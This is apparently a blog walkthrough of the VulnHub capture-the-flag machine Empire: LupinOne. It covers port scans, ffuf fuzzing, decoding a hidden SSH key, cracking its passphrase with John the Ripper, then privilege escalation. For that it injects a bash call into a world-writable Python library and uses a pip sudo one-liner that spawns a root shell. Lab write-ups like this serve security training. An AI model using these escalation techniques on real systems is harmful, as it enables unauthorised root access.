Empire: LupinOne || VulnHub Complete Walkthrough

Previously, we have completed a few single and series vulnerable boxes. If you have not yet read them, 

Click Here: 

Vulhub - Vulnerable By Design

Vulhub is a platform designed to host intentionally vulnerable web applications for educational and testing purposes. It provides a hands-on learning environment for security enthusiasts to practice identifying and exploiting various vulnerabilities in web applications.


Empire LupinOne is a vulnerable machine with difficulty level medium machine designed by icex64 and Empire Cybersecurity.


Settings Up

Firstly, we have to download the zip file from VulnHub. 

Empire: Lupin One

Empire: Lupin One is a virtual machine (VM) hosted on Vulnhub designed for penetration testing and ethical hacking practice. It contains multiple security vulnerabilities that testers can exploit to gain unauthorized access and escalate privileges. Lupin One offers a hands-on learning experience for security enthusiasts to enhance their skills in identifying and mitigating security flaws.


On completion, we have to extract the file.

Open Virtual Box, and then click on new. Fill in the name, type, and version

Click Next to customize the memory size and then browse the existing virtual disk file.

 

On completion, Check if the Network Adapter is set to Host-only adapter, or not.


Once you are done with the settings, let’s start the instance VMs.



Now, the instance is ready, and we have got a terminal screen that prompts us to input the password.


Enumeration

Our First step is to find out the target IP address using NetDiscover.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

 Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts                                                               
                                                                                                                                   
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:58:48:94      1      42  PCS Systemtechnik GmbH                                                          
 192.168.56.112  08:00:27:0b:fe:31      1      60  PCS Systemtechnik GmbH     

From the Scanning result, we have discovered our target IP address i.e., 192.168.56.112.

We have discovered the IP address, so let's perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool:


Conducting Network Scans with Nmap

  • -sC: perform a script scan using the default set of scripts,
  • -sV: enables version detection, which will detect what versions are running on what port.  

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ nmap -sC -sV 192.168.56.112
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-10 16:39 IST
Nmap scan report for 192.168.56.112
Host is up (0.056s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
|   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
|_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/~myfiles
|_http-server-header: Apache/2.4.48 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.00 seconds
┌─[mrdev@TS]─[~]
└──╼ $

From the Nmap output, we have spotted two open ports.

  • Port 22/TCP running an SSH service, which means, that if we have a valid username, and password then will be easily accessed the server.
  • Port 80/TCP runs an HTTP service, which indicates that there might be a website running. 

Web Enumeration

If you take a look at the below script, you will find out, that there is a robots.txt file disallowing a directory called /~my files on the webserver.

80/tcp open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt : 1 disallowed entry 
|_ /~myfiles
|_http-server-header: Apache/2.4.48 (Debian)

Let’s look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

If you take a look at the robots.txt file, you can spot a file that disallows from being crawled. Let’s visit this file.

We began the enumeration procedure by inspecting the (/~myfilesHTTP page. From the output, we have discovered an Error 404, which seemed suspicious.

In the older version of the Apache server, the “~tilde symbol was used to refer to the home directory of a user. 

However, this is not the case for newer versions. So, we can try to find similar paths to start with the same symbol (~).

Let’s take a look at the page source code to find a clue to foothold the instance.


There is nothing else special from the page source, so move to further steps.


Foothold

Let’s find out the hidden directories and files on the web server that can also be categorized under fuzzing.   The tool we are going to use is FFUF (A fast web fuzzer). FFUF does not come pre-installed with Kali Linux, so we have to install them separately.


Discovery of Hidden Directories and files with FFUF

Let’s perform Fuzzing to find out hidden files and directories. 

  • -c: colorize the output, 
  • -u: set the Target URL
  • -w: set the Wordlist file path.

┌─[mrdev@TS]─[~]
└──╼ $ ffuf -c -u http://192.168.56.112/~FUZZ -w /usr/share/wordlists/dirb/common.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.112/~FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

secret                  [Status: 301, Size: 318, Words: 20, Lines: 10]
:: Progress: [4614/4614] :: Job [1/1] :: 1022 req/sec :: Duration: [0:00:11] :: Errors: 0 ::
┌─[mrdev@TS]─[~]
└──╼ $

The scan results identified ‘secret’ as a valid directory name from the server. So let us open this directory in the browser.

The page contained three major hints for the machine. 

  1. The First hint is that there is a hidden file for the SSH private key.
  2. Secondly, we have a wordlist that will help us to crack the SSH hashes. 
  3. In the end, the hint also talks about the best friend, who is possibly a username.

So, our first task is to find out the hidden file which contains the SSH key. To find the secret private SSH key, we again use fuzzing with the help of FFUF once more.

Where we are going to use three new parameters. 

  • -ic: ignore wordlist comments. 
  • -fc: filter HTTP status codes from the response. 
  • -e: specify the list of extensions.

┌─[mrdev@TS]─[~]
└──╼ $ ffuf -c -ic -u http://192.168.56.112/~secret/.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 403 -e .txt,.html

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.112/~secret/.FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
 :: Extensions       : .txt .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 403
________________________________________________

                        [Status: 200, Size: 331, Words: 52, Lines: 6]
                        [Status: 200, Size: 331, Words: 52, Lines: 6]
mysecret.txt            [Status: 200, Size: 4689, Words: 1, Lines: 2]
:: Progress: [262953/262953] :: Job [1/1] :: 456 req/sec :: Duration: [0:09:29] :: Errors: 0 ::
┌─[mrdev@TS]─[~]
└──╼ $

After completing the scan, we identified one file that returned 200 responses from the server. So, let us open that file on the browser.

When we open the file on the browser, it will redirect us to a new page that might contain some encoded message. We need to figure out the encryption type to decrypt the actual SSH key. 


Decrypting Encrypted text with CyberChef

Visit Cyberchef. To  Learn More: 

CyberChef: The Cyber Swiss Army Knife

This article explores CyberChef, a versatile tool used by cybersecurity professionals for various tasks such as encoding, decoding, encryption, and decryption. It discusses the features of CyberChef and its significance in analyzing and manipulating data during security assessments and forensic investigations.



Paste the string in the input section and Drag and Drop each operation to the recipe to match the encryption Type. After analyzing I found out that the string is encrypted with base 58.

The string was successfully decoded without any errors. We have identified an SSH private key, that can be used for SSH login on the target machine. 

Save the key into the file using the nano text editor.

┌─[mrdev@TS]─[~]
└──╼ $ sudo nano ssh_key.rsa
[sudo] password for mrdev: 


Decrypting SSH Key Files with John The Ripper

Since the author has shared some hints related to the passphrase for the SSH Key, thus we are going to use SSH2john to obtain the hash value of the SSH key. 

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ locate ssh2john
/usr/share/john/ssh2john.py
┌─[mrdev@TS]─[~]
└──╼ $ /usr/share/john/ssh2john.py ssh_key.rsa > ssh_hash
┌─[mrdev@TS]─[~]
└──╼ $ cat ssh_hash 
ssh_key.rsa:$sshng$2$16$f2df77361693c16003677b8a33deeb06$2486$6f70656e7373682d6b65792d7631000000000a6165733235362d636263000000066263727970740000001800000010f2df77361693c16003677b8a33deeb06000000100000000100000217000000077373682d727361000000030100010000020100c1cc78f325cbe4f465e2cada65813f73fe63fdd4da8e53d428030a29e493718447e6fe3e4a426763fc907bb10d61068b4e36fa9a01d9ac2be3982fd1fa3526f48cc6cc738b2816b0629e82c4931f3de01fcfa944ce0deb0c115fda2b6d9429e81dc2527d02b7fed58e3c57cea09334bac73a0a9ff131564029b1d8a6211bc686cbf864c98c6449132284c41b3eeb683ed01c31178aeb16974864877deb4190ab16c6454fb274c0a80bad7da99a83100baa38d8e40968d2c1cd3c4263a8d4d810d0102a15b913cbede25ad3f9d17c268eac8ccf7d9fcd35882efc395fd4299b5c4b02566943ef571b3eac1f58a19fde159e12bd16750844b937f93b20c80b051b83474b88acf891cb2461c0f31f4667683b268e862fdae2d52e2d7d8eb7e7a7fb55a0b6ca9b7f489a657a26e6e3e899a91d77b07b02a2bfacf59cd13c9a41cca58e4885ed1c2ddcafdf5e9b148f0efb7cb99b780f22151493bf02e67d1550e3d240cb31e7a77e07d1f66c5888da5a35f264c56b06b4a5f5dd701557664a2e5f79e5641d7f5e88a9ef52c7de43c8ed4edf3eccf91321483d621a10db119b39dbb58f5a8d085b8c70231429408735c98b82c667a9a368612297ef60e14ee98ed100a98bf5fb7c7c17ecee899b1574caffeba31ae1eea2c0f2ea9adceddd488519be087b5c5a5907fb527968294ca32ef33005b6f781161a9016d0029a0e3611a8610000075064b8515cb4008dae50f1375f34bdccea9975ecfa87dd1520e27a23612822dd4aa143b1200b69790b5fc0c50e9158db7eaa404d69a02f8b26c3c72584a964eaf47068ed5a932431c067cc3f6eca70a3859f628da3d8fef318ee6b4764d098f127a8580c585d3a0acb672effea55c8643be8a62ddc9d004fbc00d8e47768c324d28d4ba28ceecaf3ab07771730787be7305f810c8079e0fb2f2606fdbef3eb31af57165c6bf839ef6097c5749795b40ec3f011f00ae100fe1225136416857661109edfc5a1404a7847a93edf8b4afa452811a5406f053e21c858c8cf196ab4af1d5a44bc550f8803521c267f6fea5d290b41cd3939fd51ff264dd03dc1faf44272c7cfe0444fe095063acfa9c2eaea06e0090897e80ec59d2158926fd11d5282b73dd66055718c26b943c5441e5814c1c359b62667422f719b54c51b12936fee583599716e2d0ec90454f7edaea137e9fb66f5e27f9d60ec66837165b8e8e1c178e0f4c5d1653a53452c256ea60dc943928e974a308ae2d93cbebe2a401f0e2c140c6db08e11538e3a6f6bbbcf5ed5af8508a8443cfe8b7f0a0118264c92a74ea9499ab2dbc27949a1b7a6b5cfa9d74e2ce89a6672c7e96d83d73dc5f78ef2d835c5ab027a5d4196e22150ac060e42c278812c0f51d80c15dbf878e61dfc33462a67fed2ee34f2cd8c69f1f4ba5577b33bd858e4ea5972f0a5062fbcfde4702dc264a0a8846537e33988a941e4255a7ead33e7d541f2f6fda0c5069020b955045f2a5cef2a73e4d007bd4323d4cc00f2fa00ae4361e64a4253c4ce8ac68654a4309fbe7d3c4f1b74767ec29d3ac53c621c4ce70d8b6c731aedf00bb8e966f92771937ea91074b9c77abdf274e26713d37539a2afbebb25f1f2de8428449ae0b5dc70f18d8697e19c4720be2e9004c0604353e1d094a7501ee38eb923a82d6af2a44db847161f21e0b5cef9270128e5178b755fe164158f0fc65e7e6f14cad14349a804078d048fd8db0f91a81cc3c1c7c54938b850fb8ff1b9a6a2ac2eecf4e717e160d9797dc4d058cff64ab7404607cdc8b1cd70a99392a7566c4fba5eef362790da0a818ed47d040dcfa825cf7881f43965d813e2d19c6df95ba99eaaa401c3c8123f09f8f589585b7c31bf51b7ab1a9a6a81b6dc74f777129cb2ca7e5ea99200b689233625a671f90a66a8e1e050e23bfbab129186ca6501b6cbdbbe34797b6b864dc021689ac358740d15eb9b61a4bdbbc011ec31dec5c4b4f9cc1b8615c950057e0237ecc503adc2cef77a156f8a7fac71eaa8f34c3703359ecf9a745ed1123cc5c2be3fb6b66ad17164ae909ee5f0581f9f18c9f3bf83cba9dc3331712488eb746a49b93ad19de2622c01f22420a2bb599b452c41bccb8fd8b5ca2290e8e7a44506841b1ba22140354af66840ef4d9d3a34495cbb987cf31b5ee72b894c257a93c65d3cab6e8ecef76a7af317f5bdc600155a1fb7ec631a1717b783b114b1f37a63adc49dfadd3eb7f618850febdb3df461fab02dab3b96da09a2d4dc98fa88236f09a57fe796990431cb97a0b0f32ef099391a3b01877c250aed836032b3ca471b29f29453034e7d7780f25360984b0cee07f7eedd672f36e6691f2a76213e78a8294160a892b6cacc106913cb6a41d4caf88d5eab71caa29ce6a610326945d4cf9f4a31311187d76c8701859ee05d8c1a9465fbb97f2f93cccee5d87d5bd49b3b82f1948f274af7b31892560465d90194a22e4095a74f0f78ac6628dd92d53cf1aa85bb54e9c8de306f283dc8a505d2b1b4e0cf9581d3b0549946f1097975358cd71cf1003fde4893c70c07c30ec857049530fc057251057d88eb31ce87ee106b8fa8564f5996e2c1c5ebb6dab5601bb9794c77233bb2f862e6e25ee1363fbbbbee86d651f7a5b42f304348c0ad68b6eb1fc852dfc53fc36af7ae290fb9bf74f1d013cfe8878575353196ac3b0adc06cb93f32b81139283b21ce014bff08c1156e0be776c353eaf97fb33246e51290f8f48bae21acc9047937b3a4b25948497c3eaee02dcdf330b725e6e5ea2c5e54cdaf109599d9585ccbedf5a8ff343bff8a93d35459a96ccfee8ab76cae7815cdd4b2c524d45532f54ef36debcd554e636c97c3c01564a3aa0d1ce0bc19350079d2eebde57c758487947236188420a67ec034ae38a7a7a9cef519fbe0995394ca9613b68239dbb7e217ff6b4b73101f667797ea96330e40d4f53604290cb28d3ad0e204f4fe4a7c5ddab716e20158a2ea829f067461a8cdace12a560d977cc4f69f92d04f32037ded3ccb58cea98b43604be7c9b493e90d12fcbd31af1421c7562e1281307ae3e1d3007e77b900b9aa2ce3e6ddfc8a7dcb096b4f131195dde88a6f1b8cc6d0c6c3048b4ff0ca71941be74b10b095312a4b8cc9fbc3402f70ca16271f4ff89bd6a181a4f0cd015fc9fec36d3334fac5caae54d874c6063598ad29ea81d5bb14d87a43821dc7bae74855bb571bbe2765a2cf4debd2ad929200e8adf90cfa336640b89279b3b50496aacb96247614037e8011029b646acc1dc7ba3f26337f518ad446b4885e8e9b16ac391b4b35473214c4cf8b48c0780a934d414c3df8af279e97fe0e465b0289427ae9699150df44a15964782cd02708af2$16$614
┌─[mrdev@TS]─[~]
└──╼ $

Now, run John the Ripper to crack the hash value. 

┌─[mrdev@TS]─[~]
└──╼ $ john --wordlist=/usr/share/wordlists/fasttrack.txt ssh_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
P@55w0rd!        (ssh_key.rsa)
P@55w0rd!        (ssh_key.rsa)
P@55w0rd!        (ssh_key.rsa)
3g 0:00:00:17 DONE (2022-02-10 19:14) 0.1690g/s 12.50p/s 12.50c/s 12.50C/s 2003..starwars
Session completed
┌─[mrdev@TS]─[~]
└──╼ $

From the output, we obtained a password. 


Establishing SSH Connection with SSH Key Authentication

Now we have a username and password, let's perform a secure shell connection to enable secure remote connections using the usernames and the relevant passwords.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ ssh -i ssh_key.rsa [email protected]
Enter passphrase for key 'ssh_key.rsa': p@55w0rd!
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Thu Oct  7 05:41:43 2021 from 192.168.26.4
icex64@LupinOne:~$ 

We successfully authenticated and got a secure shell. As it’s depicted now, we have accessed the user Icex64Next, run the ls command to list the files and the directory's contents. As a result, we found the user.txt

icex64@LupinOne:~$ cd /home
icex64@LupinOne:/home$ ls
arsene  icex64
icex64@LupinOne:~$ ls
user.txt
icex64@LupinOne:~$ cat user.txt 
    ...,    ,...    ..,.   .,,  *&@@@@@@@@@@&/.    ,,,.   .,..    ...,    ...,  
    ,,,.    .,,,    *&@@%%%%%%%%%%%%%%%%%%%%%%%%%%%&@,.   ..,,    ,,,,    ,,,.  
..,.    ,..,  (@&#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&%,.    ..,,    ,...    ..
    .... .@&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  ....    ....    ,...  
    .,#@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@  .,..    ,.,.    ...,  
.,,,&%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@#@.,    .,.,    .,..    .,
...@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&@####@*.    ..,,    ....    ,.
   @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@%#######@% .,.,    .,.,    .,.,  
..,,@@%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@@@@@@@%#######@@,    ..,.    ,..,    ..
.,,, @@@@@@@@&%%%%%%%%%%%%%&@@@@@@@@@@@@@@@@@@@%%%#####@@,    .,,,    ,,.,    .,
    ..@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%###@@ .,..    ...,    ....  
...,  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#&@.    ...,    ...,    ..
....   #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%@.    ....    ....    ..
    .,.,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%#@*.,.,    .,.,    ..@@@@
..,.    .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%#@@    ..,.    ,..*@&&@@.
.,,.    ,.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%@@    .,,.    .@&&&@( ,,
    ,.,.  .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%%%%%%%@@%%&@@@, ,,,@&@@@.,,,  
....    ...#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&%%%%&%,@%%%%%%%#@@@@@%..    ..
...,    ...,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&&&@,*,,@%%%%%%@@@&@%%@..    ..
    ,,.,    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/,***,*,@%%%@@&@@@%%###@ ,,.,  
    .,. @@&&&@@,,/@@@@@@@@@@@@@@@@@@@@@@@@#,,,,,,,,,*,,@%%%@&&@@%%%%%##&* ,...  
.,,, @@&@@&@&@@%,*,*,*,*,***,*,*,***,*,*,*,*,*,*,**,&@%%&@@@&@%%%%%%%%@/.,    .,
  /@@&&&&&&&&&&@@*,,,,,,,,,,,,,,,,,,,,,,*,,,**,%@&%%%%@&&&@%%%%%%%%%@(    ,..,  
 @&@&@&@&@&@&@&&@@@@@(,*,*,,**,*,*,,,*#&@@&%%%%%%%%&@@@@@%%%%%%%%@&..,    .,.,  
@@@&&&&&&&&&&&&&&&&&@@@&&&@@@@&&@@&&@&&&%&%%%%%%%@&&&@&%%%%%%&@,..    ...,    ..
 @&&&@&@&@&@&@&@&@&@&@&@&@&@&&@@@&&&&&&&%&%%%%&@&&@@%%%#&@%..,    .,.,    .,.,  
  @@@@&&&&&&&&&&&&&&&&&&&&&&@&&&&&&&&&&&%%&%@&@&@&@@%..   ....    ....    ,..,  
.,,, *@@&&&@&@&@&@&@&@&&&&&&&&&&&&&&&&&%&&@@&&@....    ,.,    .,,,    ,,..    .,
    ,,,,    .,%@@@@@@@@@@@@@@@@%,  ...,@@&&@(,,    ,,,.   .,,,    ,,.,    .,,.  
    .,.,    .,,,    .,,.   ..,.    ,*@@&&@ ,,,,    ,.,.   .,.,    .,.,    .,.,  
...,    ....    ....    ,..    ,..@@@&@#,..    ....    ,..    ...,    ....    ..
    ....    ....    ...    ....@.,%&@..    ....    ...    ....    ....    ....  
    ...,    ....    ....   .*/,...&.,,,    ....    ....   .,..    ...,    ...,  
.,.,    .,.,    ,,.,    .,../*,,&,,    ,.,,    ,.,,    ..,    .,.,    .,.,    ,,

3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
icex64@LupinOne:~$ 

Since the running shell does not have root permission, So, let’s identify further information about the target machine, which could be useful for gaining root access.


Privilege Escalation

Let's identify the rights, and privileges of the current user by executing the sudo -l command. 

icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$

After analyzing the output, we confirm that the running Python script may be vulnerable to the Python Library Hijacking approach. You find out more about this vulnerability by searching on Google.


Python Library Hijacking

Let’s take a look at the contents of the Python script.

icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser

print ("Its not yet ready to get in action")

webbrowser.open("https://empirecybersecurity.co.mz")
icex64@LupinOne:~$

Upon reviewing the code, we discovered crucial information. Running this Python script opens the web browser and shows the URL.

To elevate privileges, we can inject a bash shell script and rerun the program. We need to use the locate command to locate the library's location.

icex64@LupinOne:~$ locate webbrowser
/usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$

From the output, we have obtained the location of the Python library of “webbrowser.py”.

We will now begin our Python Library Hijacking procedure. You will list the details of the library if we have to change the read, and write permission.

icex64@LupinOne:~$ ls -al /usr/lib/python3.9/webbrowser.py
-rwxrwxrwx 1 root root 24110 Feb 10 08:54 /usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$

Now open the Python script using the nano command to edit the script. 

icex64@LupinOne:~$ nano /usr/lib/python3.9/webbrowser.py

Now add the below script to call root shell.

os.system("/bin/bash")

Let’s execute the Python script to switch the user to Arsene. 

icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/home/icex64$

We have switched to the user Arsene, but we don't have root privilege, so let's again identify the rights, and privileges of the current user Arsene.

arsene@LupinOne:/home/icex64$ sudo -l
Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
arsene@LupinOne:/home/icex64$

After analyzing the output, we spotted a new vulnerability that will help us to escalate the privilege. This is known as PIP Privilege Escalation


PIP Privilege Escalation

You will find detailed information by searching on Google. 

GTFOBins: pip

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions and escalate privileges on a compromised system. The GTFOBins page for pip provides information on how the pip package manager can be abused to gain unauthorized access or execute arbitrary commands with elevated privileges. It serves as a valuable resource for security professionals and penetration testers to understand and mitigate potential security risks associated with the pip utility.


Copy each of them, and paste them to the terminal one by one to get the root shell.

arsene@LupinOne:/home/icex64$ TF=$(mktemp -d)
arsene@LupinOne:/home/icex64$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
arsene@LupinOne:/home/icex64$ sudo pip install $TF
Processing /tmp/tmp.UqEhvH8ffJ
# whoami
root
#

Finally, we have the root shell and verify using the whoami command. It has been proven that it is the root, simply change the directory to the /root path to obtain the root flag.

# cd /root
# ls
root.txt
# cat root.txt
*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(((((((((((((((((((((,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,                       .&&&&&&&&&(            /&&&&&&&&&                       
,                    &&&&&&*                          @&&&&&&                   
,                *&&&&&                                   &&&&&&                
,              &&&&&                                         &&&&&.             
,            &&&&                   ./#%@@&#,                   &&&&*           
,          &%&&          &&&&&&&&&&&**,**/&&(&&&&&&&&             &&&&          
,        &@(&        &&&&&&&&&&&&&&&.....,&&*&&&&&&&&&&             &&&&        
,      .& &          &&&&&&&&&&&&&&&      &&.&&&&&&&&&&               &%&       
,     @& &           &&&&&&&&&&&&&&&      && &&&&&&&&&&                @&&&     
,    &%((            &&&&&&&&&&&&&&&      && &&&&&&&&&&                 #&&&    
,   &#/*             &&&&&&&&&&&&&&&      && #&&&&&&&&&(                 (&&&   
,  %@ &              &&&&&&&&&&&&&&&      && ,&&&&&&&&&&                  /*&/  
,  & &               &&&&&&&&&&&&&&&      &&* &&&&&&&&&&                   & &  
, & &                &&&&&&&&&&&&&&&,     &&& &&&&&&&&&&(                   &,@ 
,.& #                #&&&&&&&&&&&&&&(     &&&.&&&&&&&&&&&                   & & 
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&             &(&
*& &                 ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&            & &
*& *              &&&&&&&&&&&&&&&&&&&@.                 &&&&&&&&             @ &
*&              &&&&&&&&&&&&&&&&&&@    &&&&&/          &&&&&&                & &
*% .           &&&&&&&&&&&@&&&&&&&   &  &&(  #&&&&   &&&&.                   % &
*& *            &&&&&&&&&&   /*      @%&%&&&&&&&&    &&&&,                   @ &
*& &               &&&&&&&           & &&&&&&&&&&     @&&&                   & &
*& &                    &&&&&        /   /&&&&         &&&                   & @
*/(,                      &&                            &                   / &.
* & &                     &&&       #             &&&&&&      @             & &.
* .% &                    &&&%&     &    @&&&&&&&&&.   %@&&*               ( @, 
/  & %                   .&&&&  &@ @                 &/                    @ &  
*   & @                  &&&&&&    &&.               ,                    & &   
*    & &               &&&&&&&&&& &    &&&(          &                   & &    
,     & %           &&&&&&&&&&&&&&&(       .&&&&&&&  &                  & &     
,      & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&*          &  &                & &      
,       #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&        &.             %  &       
,         &  , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.     &&&&          @ &*        
,           & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&.  /&&&&&&&&    & &@          
,             &  & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&&&&&&@ &. &&            
,               && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&               
,                  &&  &( .&&&&&&&&&&&&&&&&&&&&&&&&&&&  &&  &&                  
/                     ,&&(  &&%   *&&&&&&&&&&%   .&&&  /&&,                     
,                           &&&&&/...         .#&&&&#                           

3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.

Congratulation! On completion of the CTF challenge.

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!